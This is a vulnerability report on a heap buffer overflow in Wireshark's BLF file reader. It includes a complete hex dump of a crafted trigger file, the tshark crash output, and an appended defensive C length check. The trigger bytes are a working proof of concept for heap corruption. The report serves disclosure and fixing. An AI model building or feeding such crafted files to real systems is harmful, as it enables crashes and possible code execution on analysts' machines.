Heap buffer overflow vulnerability in BLF reader
**Description:**
A heap-buffer overflow vulnerability has been discovered in Wireshark's Binary Logging Format (BLF) file processing. The vulnerability occurs in the `blf_pull_logcontainer_into_memory()` function in the `wiretap/blf.c` file. The vulnerability could be exploited by providing a maliciously crafted BLF file, which could lead to arbitrary code execution.
Tested on: Ubuntu 22.04.2 LTS
**Details:**
The overflow is triggered by a call to `memcpy` (displayed as `__asan_memcpy` in the ASAN output), copying 28 bytes into a memory region that is only 15 bytes large. This region was allocated in `blf_pull_logcontainer_into_memory` using `calloc` at `wiretap/blf.c:499`.
After the overflow, the program execution continues until it attempts to allocate memory with `malloc` in `wmem_strdup_printf` (as part of error handling), causing a crash with the message `malloc(): corrupted top size`.
**Steps to reproduce:**
```
$ xxd -g1 trigger
00000000: 4c 4f 47 47 30 00 00 00 30 30 30 30 30 30 30 30 LOGG0...00000000
00000010: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000
00000020: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000
00000030: 4c 4f 42 4a 10 00 01 00 0f 00 00 00 0a 00 00 00 LOBJ............
00000040: 02 00 30 30 30 30 30 30 30 30 30 30 30 30 30 30 ..00000000000000
00000050: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000
00000060: 30 30 30 30 30 30 30 30 30 30 30 30 000000000000
$ tshark -r trigger
malloc(): corrupted top size
Aborted
```
For a more detailed understanding of this vulnerability, I've attached the following files:
* **Trigger File**: This is the crafted BLF file that provokes the heap buffer overflow when processed by Wireshark.
* **ASAN Output**: AddressSanitizer's (ASAN) report provides additional insight into the memory corruption.
* **GDB Backtrace of Tshark**: This backtrace reveals the call sequence leading up to the crash in Wireshark's Tshark utility.
* **GDB Backtrace of the Fuzzer**
I'd also like to request a CVE ID for this vulnerability.
Please let me know if you need any additional information or assistance in addressing this vulnerability.
Regards,
Huáscar
[trigger](/uploads/51a3aee5c1722e25a4c5e705441f17cb/trigger)
[ASAN.txt](/uploads/b42bb8e7c5fbda2411b8f6797e51ee5b/ASAN.txt)
[GDB_Backtrace_tshark.txt](/uploads/743bd8a61987bd875980095413e3e91e/GDB_Backtrace_tshark.txt)
[GDB_Backtrace_fuzzer.txt](/uploads/dd2a3b634ff782865099ca75b5f6eb89/GDB_Backtrace_fuzzer.txt)
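Added example, not part of the original report and not Wireshark's code: a length-consistency check on the `LOBJ` header from the xxd dump above, which declares an object length of 15 (the size of the overflowed allocation) while its header length is 16. The field layout, the names `lobj_check` and `lobj_header`, and the status codes are assumptions made for illustration; the report does not state the root cause or the upstream fix.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Assumed LOBJ block header layout (little-endian, 16 bytes):
 * magic[4], header_length u16, header_type u16, object_length u32, object_type u32. */
#define LOBJ_MIN_HEADER 16u

/* Constructed sample: bytes 0x30-0x41 of the xxd dump in the report. */
static const uint8_t trigger_lobj[18] = {
    0x4c, 0x4f, 0x42, 0x4a, 0x10, 0x00, 0x01, 0x00,
    0x0f, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x00, 0x02, 0x00
};

typedef struct {
    uint16_t header_length, header_type;
    uint32_t object_length, object_type;
} lobj_header;

typedef enum {
    LOBJ_OK, LOBJ_TRUNCATED, LOBJ_BAD_MAGIC, LOBJ_HEADER_TOO_SHORT,
    LOBJ_OBJECT_SHORTER_THAN_HEADER, LOBJ_OBJECT_PAST_END
} lobj_status;

/* Read an n-byte little-endian unsigned integer (n <= 4). */
static uint32_t rd_le(const uint8_t *p, size_t n)
{
    uint32_t v = 0;
    while (n--) v = (v << 8) | p[n];
    return v;
}

/* Validate one header against the bytes actually available, before any
 * allocation or copy is sized from its fields. */
lobj_status lobj_check(const uint8_t *buf, size_t avail, lobj_header *h)
{
    if (avail < LOBJ_MIN_HEADER) return LOBJ_TRUNCATED;
    if (memcmp(buf, "LOBJ", 4) != 0) return LOBJ_BAD_MAGIC;
    h->header_length = (uint16_t)rd_le(buf + 4, 2);
    h->header_type   = (uint16_t)rd_le(buf + 6, 2);
    h->object_length = rd_le(buf + 8, 4);
    h->object_type   = rd_le(buf + 12, 4);
    if (h->header_length < LOBJ_MIN_HEADER) return LOBJ_HEADER_TOO_SHORT;
    if (h->object_length < h->header_length) return LOBJ_OBJECT_SHORTER_THAN_HEADER;
    if (h->object_length > avail) return LOBJ_OBJECT_PAST_END;
    return LOBJ_OK;
}

int main(void)
{
    lobj_header h;
    return lobj_check(trigger_lobj, sizeof trigger_lobj, &h) == LOBJ_OBJECT_SHORTER_THAN_HEADER ? 0 : 1;
}
```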